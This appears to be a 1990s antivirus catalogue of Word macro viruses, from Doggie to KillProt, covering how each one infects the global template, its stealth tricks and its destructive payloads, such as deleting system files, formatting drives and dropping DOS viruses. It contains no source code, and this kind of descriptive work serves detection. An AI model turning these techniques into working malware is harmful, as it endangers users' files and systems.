" REM Code is commented. "
" REM Joel McNamara, December 17, 1994 "
[Word.Doggie.A]
Virus name: Word.Doggie.A
Virus Type: Word macro virus
Number of macros: 3
Encrypted: No
Macro names: AutoOpen, Doggie, FileSaveAs
Size of macros: 610 Bytes
Place of origin: USA
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: No
Description:
Doggie infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected with the "FileSaveAs" command.
Doggie is one of the very few non-destructive macro viruses.
It only infects other files and displays the following message:
" Doggie "
[Word.Drugs.A:De]
Virus name: Word.Drugs.A:De
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoOpen, Dateidrucken, DateidruckenStandard,
DateiSpeichern, DateiSpeichernUnter, DateiSchliessen,
DokumentSchliessen, DateiDokVorlagen, ExtrasMakro
Size of macros: 8013 Bytes
Place of origin: Germany
Date of origin: March 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
Drugs infects the global template when an infected document is
opened (AutoOpen).
Drugs uses language specific commands, therefore it only
works with the German version of Microsoft Word.
It uses "ExtrasMakro" and hides DokumentVorlagen to make
recognition of an infected document more difficult (called
macro stealth technique).
Drugs contains several destructive payloads.
1. It deletes all *.DLL files in the following directory:
C:\WINDOWS\SYSTEM
2. It replaces words in documents that are printed:
"und" replaced with "oder"
"da▀" with "das"
"nΣmlich" with "nΣhmlich"
3. It inserts page breaks.
[Word.Dub.A]
Virus name: Word.Dub.A
Virus Type: Word macro virus
Number of macros: 13
Encrypted: Yes
Macro names: AutoExec, NewDocInsert, ToolsMacro, FileTemplates
FileSaveAs, FcDub, AeDub, Annhilator, Message
SearchDestroyer, ExeKiller, KillIt (FileClose)
Size of macros: 22669 Bytes in Documents
25325 Bytes in global template
Place of origin: Baku, Azerbaijan
Date of origin: Spring 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
When Dub becomes active, it searches the C:\ drive for
documents (C:\*.DOC). It infects all documents that have the
Word 6/7 format.
After each infection, Dub writes a log file where it mentions
all the killed documents (existing text is replaced with "666").
Dub.A uses "ToolsMacro" and "FileTemplates" to make
recognition of an infected document more difficult (called
macro stealth technique). We advise not to access the two
menu items, because it will result in the execution of Dubs
viral code.
Dub contains various payloads:
1. When an infected document is saved (FileSaveAs) at 4:00
o'clock, Dub displays the following message:
" Do you believe in Satan? "
2. When Microsoft Word is started (AutoExec) on the 13th of
each month, Dub tries to delete the following files:
*.EXE.
3. Upon infection, all existing text is replaced with " 666 ".
[Word.Dzt.A]
Virus name: Word.Dzt.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen (FileSave), FileSaveAs
Size of macros: 2033 Bytes
Place of origin: Indonesia
Date of origin: April 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Dzt.A activates when an infected document is opened
(AutoOpen). Further documents become infected when they
are saved with the "FileSave" and "FileSaveAs" commands.
When infecting a document, Dzt.A adds the following text to
the Comments section of File|Properties:
" DZT "
[Word.Dzt.B]
Virus name: Word.Dzt.B
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen (FileSave)
Size of macros: 1214 Bytes
Place of origin: Indonesia
Date of origin: April 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Dzt.B activates when an infected document is opened
(AutoOpen). Further documents become infected when they
are saved with the "FileSave" command.
The main difference between this new variant and the original
Dzt.A virus is that the "FileSaveAs" macro is missing.
[Word.Dzt.C]
Virus name: Word.Dzt.C
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: FileSaveAs
Size of macros: 819 Bytes
Place of origin: Indonesia
Date of origin: April 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The main difference between this new variant and the original
Dzt.A virus is that the "AutoOpen" macro is missing.
Dzt.C was most likely created by an older version of a popular
anti-virus product. The disinfection routine was faulty and
forgot to remove the "AutoOpen" macro.
[Word.Dzt.D]
Virus name: Word.Dzt.D
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen (FileSave), FileSaveAs
Size of macros: 2584 Bytes
Place of origin: Indonesia
Date of origin: April 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and the original
Dzt.A virus is that the comment in the File|Properties
section was changed from "DZT" to "DZT'96."
The "FileSaveAs" macro is also partially corrupted.
For more information, please refer to the Dzt.A virus description.
[Word.Easy.A (a.k.a. EasyMan)]
Virus name: Word.Easy.A (a.k.a. EasyMan)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1090 Bytes
Place of origin: Austria
Date of origin: September 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Easy activates when an infected document is opened
(AutoOpen). If the "AutoOpen" macro already exists in the
global template, Easy does not infect.
The following text will be inserted at the top of an opened
document at a random date and with a random color:
" It's Easy Man "
After that Easy displays the following text at the status bar:
" Word.EasyMan, written by Spooky "
[Word.Epidemic.A]
Virus name: Word.Epidemic.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, AutoExec
Size of macros: 38746 Bytes
Place of origin: Taiwan
Date of origin: January 1997
Destructive: Yes
Common In-The-Wild: No
Description:
When an infected document is opened, Epidemic infects the
global template (normal.dot). Further documents become
infected when they are opened (AutoOpen) or Microsoft Word is
started (AutoExec).
Epidemic has various destructive payloads:
1. On April 27, Epidemic formats the hard disk (similar to FormatC).
2. On June 17, it uses DEBUG.EXE to drop the Dos-based virus
"Natas" into the C:\MOUSE.COM file. It also modifies
C:\AUTOEXEC.BAT to call C:\MOUSE.COM upon the next boot-up.
3. On October 10, it deletes the following files:
" C:\IO.SYS "
" C:\MSDOS.SYS "
" C:\COMMAND.COM "
This action will leave the computer unbootable.
It then displays the following message:
" EPIDEMIC Macro Virus V1.1 "
Epidemic only works with the Chinese version of Microsoft Word.
[Word.Trojan.FormatC (a.k.a. TrojanFormat)]
Virus name: Word.Trojan.FormatC (a.k.a. TrojanFormat)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 81 Bytes
Place of origin: Posted to Usenet
Date of origin: Unknown
Destructive: Yes
Common In-The-Wild: No
Description:
FormatC is not a virus but a trojan horse, which does not
replicate.
When an infected document is opened, the trojan triggers the
destructive payload, which types " Format C: /U " in a minimized
DOS box and then formats the C drive.
FormatC is very unlikely to spread since it does not infect
other files.
[Word.Friendly.A:De]
Virus name: Word.Friendly.A:De
Virus Type: Word macro virus
Number of macros: 20
Encrypted: No
Macro names: Abbrechen, AutoExec, AutoOpen, Cancel,
DateiBeenden, DateiNeu, DateiOeffnen,
DateiSchliessen, DateiSpeichern,
DateiSpeichernUnter, ExtrasMacro,
ExtrasMakro, Fast, FileExit, FileNew, FileOpen,
FileSave, FileSaveAs, Infizieren, Talk
Size of macros: 9867 Bytes
Place of origin: Germany
Date of origin: May 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Friendly was an effort to write a virus for more than one
language, yet due to some wrong translations (ExtrasMacro
instead of ToolsMacro) Friendly does not work with other
versions than the German version of Microsoft Word.
Friendly tries to infect the global template (normal.dot) when
an infected document is opened. It checks the global template
for a previous infection by looking for the text "Friendly",
Author = Nightmare". After the macros have been transferred the
destructive payload is called from the "Fast" macro.
Friendly infects other documents whenever new ones are created,
an action is canceled, and whenever documents are opened,
closed, saved, or exited from Word. Friendly does not check
for a previous document infection. It simply overwrites existing
macros.
The destructive payload, inside the "Fast" macro, is called
when the system clock has a second value smaller than 2.
Friendly then creates a debug script inside the C:\DOS
directory and executes the DOS DEBUG.EXE command. In
addition, Friendly adds an entry into AUTOEXEC.BAT, so the
DOS based virus is started after the next boot-up. The DOS
based virus inside Friendly has a size of 395 Bytes and is a
memory resident companion virus encrypted with CryptCOM.
Friendly displays the following message on January 1:
" Ein gutes neues Jahr ! "
and infects EXE files upon execution. COM files are created
with the same name as EXE files and with the attributes "READ-ONLY"
and "HIDDEN."
If the virus is active, the following text is displayed when users
try to display the macro list:
"You can't do that!"
"I'm very anxious!"
"Hello my friend!"
"<< Friends >> Virus"
(translated:)
"Du kannst das nicht tun!"
"Ich bin sehr aengstlich!"
"Hallo mein Freund!"
"<< Friends >> Virus"
After May 1, Friendly displays the following text when
infecting documents for the first time (except for NORMAL.DOT).
"Hallo mein Freund!"
"Ich bin der << Friends >> Virus und wie heißt du?"
"Gib doch bitte anschließend unten deinen Namen ein:"
"Also ..... ich habe eine gute und eine schlechte Nachricht fuer
dich!"
"Die schlechte Nachricht ist, daß ich mich auf deiner Platte
eingenistet"
"habe und die gute ist, daß ich aber ein freundlicher und auch
nuetzlicher"
"Virus bin. Druecke bitte OK fuer Weiter!"
"Wenn du mich nicht killst, dann fuege ich ein Programm in deine"
"Autoexec.bat ein, daß deine lame Tastatur etwas auf Touren bringt."
"Also ...., gib dir einen Ruck und kill mich nicht. Goodbye!"
(translated:)
"Hello my Friend!"
"I'm the << Friends >> Virus and how are you?"
"Can you give me your name, please?"
"Hello .... I have a good and a bad message for you! The bad message is
that"
"you have now a Virus on your Harddisk and the good message is that
I'm"
"harmless and useful. Press OK!"
"If you don't kill me, I will insert a programme in your AutoExec.bat
thats"
"your Keyboard accelerated. Please .... don't kill me. Goodbye!"
The entered name will then be displayed.
[Word.Fury.A (a.k.a. Greenfury)]
Virus name: Word.Fury.A (a.k.a. Greenfury)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: GreenFury, GGGFFF (FileSalvaConNome), FFFGGG, AutoOpen
Size of macros: 2322
Place of origin: Unknown
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
Fury is another virus that only works with the Italian version of
Microsoft Word.
Fury infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when
they are saved with the "FileSalvaConNome --> translated:
FileSaveAs" command.
When Fury is loaded from a non-Italian Word version, it deletes
all files in the current directory.
Fury also sets a random password to the active document.
[Word.FutureNot.A (a.k.a. Anti-IVX, Future)]
Virus name: Word.FutureNot.A (a.k.a. Anti-IVX, Future)
Virus Type: Word macro virus
Number of macros: 1 or 2 (in global template)
Encrypted: No
Macro names: AutoOpen (FileSaveAs)
Size of macros: Polymorphic
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
FutureNot is the first polymorphic macro virus.
When an infected document is opened, FutureNot infects the
global template. It creates two macros in the global template.
One is always "FileSaveAs" and the second one is a copy of
"AutoOpen" with a randomly chosen name.
While the second macro remains the same, the FileSaveAs
macro changes due to randomly selected comments.
FutureNot also modifies the C:\AUTOEXEC.BAT file. It adds
the following comment at the end of the file:
" @ATTRIB -R C:\MSOFFICE\WINWORD\TEMPLATE\NORMAL.DOT > NUL "
This clears the Read-Only attribute from the global template.
[Word.Gangsterz.A (a.k.a Big Daddy Cool, Daddy)]
Virus name: Word.Gangsterz.A (a.k.a Big Daddy Cool, Daddy)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: Gangsterz, Paradise
Size of macros: 4250 Bytes
Place of origin: Germany
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description:
Gangsterz uses a new triggering mechanism. Instead of using
automatic macros (AutoOpen, etc.) or redefining built-in Word
commands, it uses assigned keys to start up its macros.
The "Gangsterz" macro is associated with pressing space and
the "Paradise" macro with pressing "e." If a user presses any of
the two keys while working on an infected document, the
associated macros are activated.
If a document is infected on January 1, a new document is
created with the following text:
" Big_Daddy_Cool virus generated by NJ "
and then filled with scrolling O's.
If the value of the XOP setting in the [intl] section of win.ini is
not set to "Installed", Gangsterz drops an intended batch file
(XOP.bat) virus after activation. It adds a line to the C:\AUTOEXEC.BAT
file to start the virus.
[Word.Goldfish.A (a.k.a Fishfood)]
Virus name: Word.Goldfish.A (a.k.a Fishfood)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, AutoClose
Size of macros: 9867 Bytes
Place of origin: USA
Date of origin: July 1996
Destructive: No
Common In-The-Wild: No
Description:
Goldfish infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened ("AutoOpen").
Goldfish is one of the very few non-destructive macro viruses. It
only infects other files and displays the following message:
" I am the goldfish, I am hungry, feed me. "
The message will not go away until the user types in an
acceptable response. Available answers are:
"fishfood"
"worms"
"worm"
"pryme"
"core"
[Word.GoodNight.A]
Virus name: Word.GoodNight.A
Virus Type: Word macro virus
Number of macros: 10
Encrypted: No
Macro names: Exit, AutoExec, AutoExit, AutoOpen,
FileOpen, FileSave, AutoClose, FileClose
FileSaveAs, FileCloseAll
Size of macros: 4992 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: Yes
Description:
GoodNight.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose, FileClose, AutoExit,
and FileCloseAll) or saved (FileSave and FileSaveAs).
When GoodNight triggers, it tries to exit Microsoft Word.
GoodNight.A devolves into GoodNight.A1 (9 macros with 4431
Bytes) and then into GoodNight.A2 (6 macros with 2763 Bytes).
GoodNight.A2 is not capable of spreading any further, it does
not infect any other documents.
[Word.Haggis.A]
Virus name: Word.Haggis.A
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 300 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Haggis infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
Haggis removes "ToolsMacro" to make recognition of an
infected document more difficult (called macro stealth
technique).
When Haggis triggers, it sets the password " Haggis " to
the active document.
If you find a document with an unknown password, please
download a copy of WinWord Password Recovery Tool
(wwprt). It is available at: www.vdsarg.com.
[Word.Hassle.a (a.k.a Bogus)]
Virus name: Word.Hassle.a (a.k.a Bogus)
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: AutoClose, Toolsmacro, Microsoft01, Microsoft02,
Microsoft03, Microsoft04, Microsoft05
Size of macros: 8283 Bytes
Place of origin: USA
Date of origin: August 1996
Destructive: No
Common In-The-Wild: No
Description:
Hassle is another virus that uses the macro "ToolsMacro" to
make recognition of an infected document more difficult
(called macro stealth technique).
If the user selects any command, it will show the following
message and close Microsoft Word:
" Out of Memory or System Resources "
Hassle is one of the very few non-destructive macro viruses. It
only infects other files and displays the following text window:
" Are you sure to Quit? "
This only happens seldomly, with a 5% probability.
Another payload asks the user to register a software with Microsoft.
Hassle will only accept:
"Bill Gates", "Microsoft" and "666"
Whenever the user selects the Tools/Macro command, Hassle
will display the following text at the bottom of the screen:
" Microsoft Word Assistant Version 6.2 "
[Word.Hellga.A (a.k.a DNZ, Hellgate)]
Virus name: Word.Hellga.A (a.k.a DNZ, Hellgate)
Virus Type: Word macro virus
Number of macros: 10
Encrypted: Yes
Macro names: AutoClose, DnZ, EditCut, EditCopy, FileNew,
FileExit, FileTemplates, ToolsSpelling, ToolsMacro,
ToolsCustomize
Size of macros: 2498 Bytes
Place of origin: Unknown
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description:
Hellga infects whenever the "DnZ" macro is called from one of
the virus macros. It then infects the global template (normal.dot)
and further documents. Hellga also adds the setting "Program=
Installed" to the [Demo] section of win.ini (Windows directory).
The following message is displayed on March 9 of each year:
" WM.DnZ "
" Written by Bill_HellGateS "
[Word.Helper.A]
Virus name: Word.Helper.A
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 409 Bytes
Place of origin: Unknown
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: Yes
Description:
Helper infects the global template (normal.dot) when an infected
document is closed. Further documents become infected when
they are also closed.
When a document is closed on the 10th of each month, Helper
triggers its destructive payload. It sets the following password
to the saved document:
" help "
[Word.Helper.B]
Virus name: Word.Helper.B
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 409 Bytes
Place of origin: Unknown
Date of origin: 1997
Payload: No
Seen In-The-Wild: Yes
Description:
Helper.B infects the global template (normal.dot) when an
infected document is closed. Further documents become
infected when they are also closed.
The main difference between this new variant and the original
Helper.A virus is that the payload routine has been modified.
Due to a mistake, Helper.B does not save any documents with
the "help" password.
[Word.Helper.C]
Virus name: Word.Helper.C
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 410 Bytes
Place of origin: Europe
Date of origin: April 1997
Payload: No
Seen In-The-Wild: No
Description:
Helper.C infects the global template (normal.dot) when an
infected document is closed. Further documents become
infected when they are also closed.
The main difference between this new variant and the original
Helper virus is that someone tried to change the trigger date
and the password.
Helper.C does not trigger its payload since one important
change in its code is missing.
[Word.Helper.D]
Virus name: Word.Helper.D
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 412 Bytes
Place of origin: Europe
Date of origin: April 1997
Payload: No
Seen In-The-Wild: No
Description:
Helper.D infects the global template (normal.dot) when an
infected document is closed. Further documents become
infected when they are also closed.
The main difference between this new variant and the original
Helper virus is that someone tried to change the trigger date
and the password.
Helper.D does not trigger its payload since one important
change in its code is missing.
[Word.Helper.E]
Virus name: Word.Helper.E
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 416 Bytes
Place of origin: Europe
Date of origin: April 1997
Payload: No
Seen In-The-Wild: No
Description:
Helper.E infects the global template (normal.dot) when an
infected document is closed. Further documents become
infected when they are also closed.
The main difference between this new variant and the original
Helper virus is that someone tried to change the trigger date
and the password.
Helper.E does not trigger its payload since one important
change in its code is missing.
[Word.Hiac.A]
Virus name: Word.Hiac.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoClose, HI (AC)
Size of macros: 576 Bytes
Place of origin: Australia
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: Yes
Description:
Hiac.A is another "do nothing" virus that does nothing
else besides infecting other files. Infection occurs
when a user closes a document (AutoClose).
Its code is faulty and the template bit of infected documents
is not set, therefore it is unlikely to spread its
code to other files.
[Word.Hot.A]
Virus name: Word.Hot.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: AutoOpen, DrawBringInFrOut, InsertPBreak,
ToolsRepaginat, FileSaveAs, StartOfDoc
Size of macros: 5515 Bytes
Place of origin: Unknown
Date of origin: January 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
When an infected document is opened the virus is activated by
the AutoOpen macro. Some replicated Hot samples also display
the following error message:
" Unable to load the specified library "
Hot turns off the prompting of Word to ensure a hidden
infection of the global template (normal.dot). It also checks
the file "WINWORD6.INI" for the following entry: "QLHot".
If not present, Hot records a "hot date", 14 days in the future.
If this variable is not already set, the global template becomes
infected.
The InsertPBreak/InsertPageBreak inserts a page-break into the
current document. However, it is also used by the virus to
determine whether or not a document is already infected.
Some of the macros are renamed when they are copied by the
WordBasic "MacroCopy" command:
"AutoOpen" becomes "StartOfDoc"
"DrawBringInFrOut" becomes "AutoOpen"
"InsertPBreak" becomes "InsertPageBreak"
"ToolsRepaginat" becomes "FileSave"
In addition, the global template contains the following macros:
"FileSave" (similar to "ToolsRepaginat")
"StartOfDoc" (similar to "AutoOpen")
Hot also uses special functions from the Windows file
"KERNEL.EXE" (Win API). It uses the API to find the path to
Windows and to open files with simple functions.
It should be noted that many other options were available to
the virus author.
The destructive payload, which is reached upon arrival of the
hot date" set under the "QLHot" section in the WINWORD6.ini
file, deletes text from the current active document. This
payload is bypassed if the file EGA5.CPI is present in the
"C:\DOS" directory.
A comment in the virus source code suggests that this is a
"feature" designed to protect the virus author and his friends.
[Word.Hunter.A:De (a.k.a. Headhunter V 3.0)]
Virus name: Word.Hunter.A:De (a.k.a. Headhunter V 3.0)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, DateiNeu, ExtrasMakro
Size of macros: 1051 Bytes
Place of origin: Germany
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Hunter.A does not infect the global template. It saves an
infected document to the Word STARTUP directory
(WINWORD.DOT), which is used to infect new documents
when they are created (DateiNeu - translated: FileNew).
Hunter.A uses "ExtrasMakro" to make recognition of an
infected document more difficult (called macro stealth technique).
When Hunter.A triggers (probability of 1/60), it displays the
following message:
" One - You lock the target "
" Two - You bait the line "
" Three - You slowly spread the net "
" And Four - You catch the man "
Hunter.A uses language specific macros, therefore it only works
with the German version of Microsoft Word.
[Word.Hunter.B:De (aka Headhunter V 3.1)]
Virus name: Word.Hunter.B:De (aka Headhunter V 3.1)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, DateiNeu, ExtrasMakro
Size of macros: 1126 Bytes
Place of origin: Germany
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
The main difference between this new variant and the previous
Hunter.A virus is that Hunter.B contains some modified codes.
Hunter.B does not infect the global template. It saves an
infected document to the Word STARTUP directory
(WINWORD.DOT), which is used to infect new documents
when they are created (DateiNeu - translated: FileNew).
Hunter.B uses "ExtrasMakro" to make recognition of an infected
document more difficult (called macro stealth technique).
When Hunter.B triggers (probability of 1/60), it displays the
following message:
" One - You lock the target "
" Two - You bait the line "
" Three - You slowly spread the net "
" And Four - You catch the man "
Hunter.B uses language specific macros, therefore it only works
with the German version of Microsoft Word.
[Word.Hunter.C:De (aka Headhunter V 3.5)]
Virus name: Word.Hunter.C:De (aka Headhunter V 3.5)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, DateiNeu, ExtrasMakro
Size of macros: Polymorphic
Place of origin: Germany
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
The main difference between this new variant and previous
Hunter viruses is that Hunter.C adds text to its macros,
therefore making it a polymorphic virus.
Hunter.C uses the same "ExtrasMakro" from variant A and B
to make recognition of an infected document more difficult
(called macro stealth technique).
Hunter.C uses language specific macros, therefore it only
works with the German version of Microsoft Word.
[Word.Hybrid.A]
Virus name: Word.Hybrid.A
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 2815 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Common In-The-Wild: Yes
Description:
As the name suggests, the Hybrid virus is a combination of a
virus with a macro anti-virus solution.
Its "AutoClose" macro has been snatched from a well-known,
yet ineffective, anti-virus solution called ScanProt (written by
Microsoft).
Hybrid activates when an infected document in opened.
Further documents become infected when they are saved with
the "FileSaveAs" command.
Hybrid has been found In-the-Wild and can be
detected/disinfected with any better anti-virus solution.
[Word.Hybrid.B]
Virus name: Word.Hybrid.B
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 2815 Bytes
Place of origin: Unknown
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
Hybrid.B is a new variant based on the original Hybrid.A
virus. The only difference between the two viruses is that the
"AutoClose" macro, snatched from the anti-virus macro
solution ScanProt, is corrupted. Due to this corruption Microsoft
Word displays a WordBasic error message whenever a document is closed.
"Unknown Command, Subroutine or Function"
For additional information, please refer to the Hybrid.A virus
description.
[Word.Hybrid.C]
Virus name: Word.Hybrid.C
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 2815 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
Hybrid.C is a new variant based on the original Hybrid.A
virus. The only difference between the two viruses is that the
"AutoClose" macro, snatched from the anti-virus macro
solution ScanProt, is corrupted. Due to this corruption Microsoft
Word displays the following error message when a user tries to close
a file:
" syntax error "
For additional information, please refer to the Hybrid.A virus
description.
[Word.Imposter.A]
Virus name: Word.Imposter.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: AutoClose, DMV (FileSaveAs)
Size of macros: 907 Bytes
Place of origin: England
Date of origin: March 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Imposter infects the global template (normal.dot) when an
infected document is closed and the macros "DMV" and
"FileSaveAs" do not exist. When Imposter.A copies the "DMV" macro,
it renames it to "FileSaveAs" and displays the following message:
" DMV "
Further documents become infected when the "FileSaveAs"
command is used.
The following text can be found inside Imposter.A, but is not
displayed:
" just to prove another point "
This text is based on the Concept virus, which has "this is
enough to prove my point" in its virus code.
[Word.Imposter.B]
Virus name: Word.Imposter.B
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: AutoClose, DMV (FileSaveAs)
Size of macros: 907 Bytes
Place of origin: England
Date of origin: March 1996
Destructive: No
Common In-The-Wild: No
Description:
The only difference between this new variant and the original
Imposter virus is the spelling of the comment in the virus code.
Please refer to Imposter.A for more information.
[Word.Irish.A]
Virus name: Word.Irish.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen, WordHelp, AntiVirus, WordHelpNT
Size of macros: 4152 Bytes
Place of origin: USA
Date of origin: Spring 1996
Destructive: No
Common In-The-Wild: No
Description:
Irish infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when
the "FileSave" command is used.
Two of the macros, "WordHelp" and "WordHelpNT", do not
run automatically. However, when executed manually by the
user, they will change the Windows desktop color to green.
The macro "WordHelpNT" contains a payload which attempts
to activate the screen saver and display the following
message:
" Happy Saint Patties Day "
However the payload seems to be faulty and does not work
under Windows 95 (Irish only exists in Microsoft Word).
[Word.Italian.A]
Virus name: Word.Italian.A
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: FileMacro, FileChiudi, FileEsci, FileSalva,
WordMacro1, WordMacro2
Size of macros: 1438 Bytes
Place of origin: Italy
Date of origin: January 1996
Destructive: No
Seen In-The-Wild: No
Description:
Italian is the first functional virus written for the Italian version
of Microsoft Word.
When an infected document is opened on the 7th, 13th, 17th
or 31st of each month it displays the following message:
" Your PC is infected by "
" Word.Macro.ITALIAN Virus "
" Written Jan,1996. "
[Word.Johnny.A(GoJohnny)]
Virus name: Word.Johnny.A (GoJohnny)
Virus Type: Word macro virus
Number of macros: 5 or 6
Encrypted: Yes, 4/5 or 5/6
Macro names: Presentv, AutoOpen, Presentw, FileSaveAs. Presentz,
FileSave, vGojohnny
Size of macros: 3393 Bytes in .doc files
4955 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description:
Johnny infects the global template (normal.dot) when an
infected file is opened. Further documents become infected
when they are saved with the "FileSave" or "FileSaveAs"
command.
When Johhny triggers it creates a new document with the
following text:
" NAIPESVOH REHM "
After that it puts the following message on the status bar:
" Starting Autosave "
To make recognition of an infection more difficult, Johnny
turns off the prompting of Word before it infects the global
template.
[Word.Johnny.B]
Virus name: Word.Johnny.B
Virus Type: Word macro virus
Number of macros: 5 (or 6)
Encrypted: Yes
Macro names: AutoOpen, Presentv, Presentw, Presentz,
vGoJohnny
Size of macros: 3992 Bytes
Place of origin: UK
Date of origin: January 1997
Payload: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Johnny.A virus is that Johnny.B is now able to infect the
French version of Microsoft Word.
The following 2 macros are changed:
"FichierEnregistre" instead of "FileSave" and "FichierEnregistreSous"
instead of "FileSaveAs".
For more information, please refer to the Johnny.A virus description.
[Word.Kerrang.A]
Virus name: Word.Kerrang.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: AutoExec, FileOpen, FileSaveAs, FilePrintDefault,
ToolsMacro
Size of macros: 972 Bytes
Place of origin: Unknown
Date of origin: February 1997
Destructive: Yes
Common In-The-Wild: No
Description:
Kerrang activates when an infected document is opened. After
the global template becomes infected, it disables the Microsoft
Word virus protection every time Microsoft Word is started
(AutoExec).
Further documents become infected when they are saved with
the FileSave and FileSaveAs commands.
Kerrang uses "ToolsMacro" to make recognition of an infected
file more difficult (called macro stealth technique). When the
user selects this option, Kerrang creates 65 new documents.
Kerrang has various payloads. It checks for the system time
and if the time is 18:00 (6:00 p.m.) is adds the following text
to the printed document:
" Kerbaffely Urgo Kerranga! Kerranga!!!! "
After that it launches its second payload which deletes all files
with the extension *.DOC in the current directory.
[Word.KillDll.A]
Virus name: Word.KillDll.A
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 284 Bytes
Place of origin: Unknown
Date of origin: Summer 1996
Destructive: Yes
Common In-The-Wild: No
Description:
KillDLL activates when an infected document is opened
(AutoOpen).
KillDLL is one of the very few destructive viruses. Upon each
startup of Word, it will delete all files in the WINDOWS
directory, matching the extensions:
*.D??
Affected are mostly .DLL files and .DRV files, which are
essential for Microsoft Windows.
[Word.KillPort.A]
Virus name: Word.KillProt.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: AutoExec, FileOpen, FileSaveAs, ToolsMacro
Size of macros: 2272 Bytes
Place of origin: Unknown
Date of origin: 1997
Payload: Yes
Common In-The-Wild: No
Description:
KillProt.A infects the global template when an infected
document is opened (FileOpen) or the ToolsMacro command
is selected. Further documents become infected when they
are opened (FileOpen) or saved (FileSaveAs).
KillProt's name was chosen because KillProt deletes the
following macros:
"AutoExit"
"InstVer"
"ShellOpen"
All of them are located in the anti-virus macro solution
"ScanProt".
KillProt also modifies .INI settings in the Windows directory.
It creates the entry "Count=xxx" under the "Infector" section.
Whenever a document is saved with the FileSaveAs command,
KillProt increments the value. The payload triggers whenever
10 documents have been saved. It then adds the following
password to the saved document:
" WhatTheHell "
[Word.MVDK1(Kit)]
Virus Kit Name: Word.MVDK1 (Kit)
Virus Type: Word macro virus
Size of document: 23618 Bytes
Number of macros: 5
